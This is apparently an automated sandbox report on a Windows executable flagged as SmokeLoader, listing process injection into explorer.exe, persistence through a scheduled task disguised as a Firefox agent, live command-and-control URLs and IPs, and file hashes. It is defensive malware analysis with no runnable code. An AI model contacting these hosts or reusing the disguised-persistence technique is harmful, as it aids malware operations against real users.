Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811644828.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1810623937.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

Code function: 0_2_00415F50 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,

0_2_00415F50

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	511 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FyDBXJE74v.exe	39%	ReversingLabs	Win32.Ransomware.LockbitCrypt
FyDBXJE74v.exe	41%	Virustotal		Browse
FyDBXJE74v.exe	100%	Avira	HEUR/AGEN.1312571
FyDBXJE74v.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\wsbgrgh	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Roaming\wsbgrgh	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wsbgrgh	39%	ReversingLabs	Win32.Ransomware.LockbitCrypt
C:\Users\user\AppData\Roaming\wsbgrgh	41%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
http://unicea.ws/tmp/index.php	0%	Virustotal		Browse
https://aka.ms/odirmr	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
http://nwgrus.ru/tmp/index.php	17%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
http://tech-servers.in.net/tmp/index.php	2%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	78.89.199.216	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://unicea.ws/tmp/index.php	true	0%, Virustotal, Browse	unknown
http://nwgrus.ru/tmp/index.php	true	17%, Virustotal, Browse	unknown
http://tech-servers.in.net/tmp/index.php	true	2%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1814735549.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1813184602.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1812705551.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1817769724.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1817769724.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1817769724.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.175.29.39	unknown	Bosnia and Herzegowina		9146	BIHNETBIHNETAutonomusSystemBA	true
78.89.199.216	nwgrus.ru	Kuwait		29357	WATANIYATELECOM-ASKW	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532550
Start date and time:	2024-10-13 17:01:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FyDBXJE74v.exe renamed because original name is a hash value
Original Sample Name:	497859eed941e073a43e8291908e6494.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/2@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:02:29	API Interceptor	469086x Sleep call for process: explorer.exe modified
16:02:28	Task Scheduler	Run new task: Firefox Default Browser Agent 07E0028B089452B1 path: C:\Users\user\AppData\Roaming\wsbgrgh

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.175.29.39	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	yosoborno.com/tmp/
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader	Browse	cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
	SecuriteInfo.com.Win32.RansomX-gen.4067.126.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader	Browse	trmpc.com/check/index.php
78.89.199.216	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	kjR9pmEPvT.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	45oPcWSKOp.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	mzxn.ru/tmp/index.php
	TfsbrHNaOX.exe	Get hash	malicious	Djvu	Browse	cajgtus.com/lancer/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	Nlwkg1ycJ4.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/lancer/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	LavMqtzZNw.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	movlat.com/tmp/
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	movlat.com/tmp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WATANIYATELECOM-ASKW	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	na.elf	Get hash	malicious	Unknown	Browse	78.89.197.195
	z3hir.arm.elf	Get hash	malicious	Mirai	Browse	78.89.177.126
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	file.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
BIHNETBIHNETAutonomusSystemBA	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	na.elf	Get hash	malicious	Mirai	Browse	92.36.229.146
	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	UV2uLdRZix.exe	Get hash	malicious	SmokeLoader	Browse	185.12.79.25
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()	Get hash	malicious	HTMLPhisher	Browse	109.175.10.156
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	O9M84hUenb.elf	Get hash	malicious	Mirai, Okiru	Browse	92.36.229.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	92.36.226.66
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	109.175.29.39

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	296960
Entropy (8bit):	5.617071692398502
Encrypted:	false
SSDEEP:	3072:ohQBX24upVVQN58sfUAJ5IpCyxF9DavUjZXFUCIqzpZAqa8i:oqFseN58u8/4OXFVIqzpZAqaR
MD5:	497859EED941E073A43E8291908E6494
SHA1:	8136E8E148DEEB6C9D18F8300F47E7B3A43B4290
SHA-256:	8484619768F32FB9368CC46BC15A16CF99C98E95A2A605068ADF5DD71090E0C7
SHA-512:	5E5AF6D5D1802AAD3160E8A139134C5CC39D6D3B10AE0ACBE686A1FEF9944D36CBA20081781ABFEAD68F3B6E37DE4182178FA293C16B6994473A6D869C9D7A06
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..K}...}...}...c.x.f...c.i.m...c...7...Z...z...}.......c.v.\|...c.h.\|...c.m.\|...Rich}...........PE..L...\|OXe.................T...ls..............p....@...........................t.....Tf......................................$...P.... r..............................................................................p...............................text...oS.......T.................. ..`.rdata..& ...p..."...X..............@..@.data...\|.o..........z..............@....kibojis.D....q..8..................@....xeto....(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wsbgrgh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
